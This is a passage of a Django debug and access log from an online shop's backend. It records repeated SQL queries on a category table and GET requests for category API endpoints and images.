"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:59:27,145 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:59:27,149 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:59:27,152 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:59:27,156 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:59:27,158 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:59:27,160 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:59:27,162 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:59:27,165 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:59:27,168 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:59:27,170 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:59:27,172 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:59:27,174 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:59:27,177 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:59:27,181 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:59:27,183 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:59:27,185 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:59:27,188 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:59:27,190 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:59:27,192 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:59:27,195 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:59:27,197 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:59:27,200 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:59:27,202 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:59:27,205 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:59:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:59:27] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 13:59:27] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 13:59:27] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 13:59:27] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 13:59:28] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:59:28] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 DEBUG 2019-12-19 13:59:30,242 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:59:30,249 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:59:30,252 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:59:30,255 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:59:30,258 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:59:30,260 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:59:30,263 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:59:30,265 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:59:30,268 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:59:30,271 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:59:30,278 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:59:30,282 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:59:30,285 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:59:30,289 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:59:30,294 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:59:30,301 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:59:30,306 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) [19/Dec/2019 13:59:30] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:59:30,310 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:59:30,314 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:59:30,318 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:59:30,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:59:30,328 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:59:30,332 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:59:30,336 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:59:30,340 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:59:30,344 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:59:30,347 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:59:30,353 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:59:30,357 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:59:30,361 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:59:30,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:59:30,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:59:30,374 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:59:30,378 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:59:30,382 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:59:30,385 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:59:30,389 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:59:30,396 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:59:30,399 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:59:30,403 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:59:30,407 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:59:30,409 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", 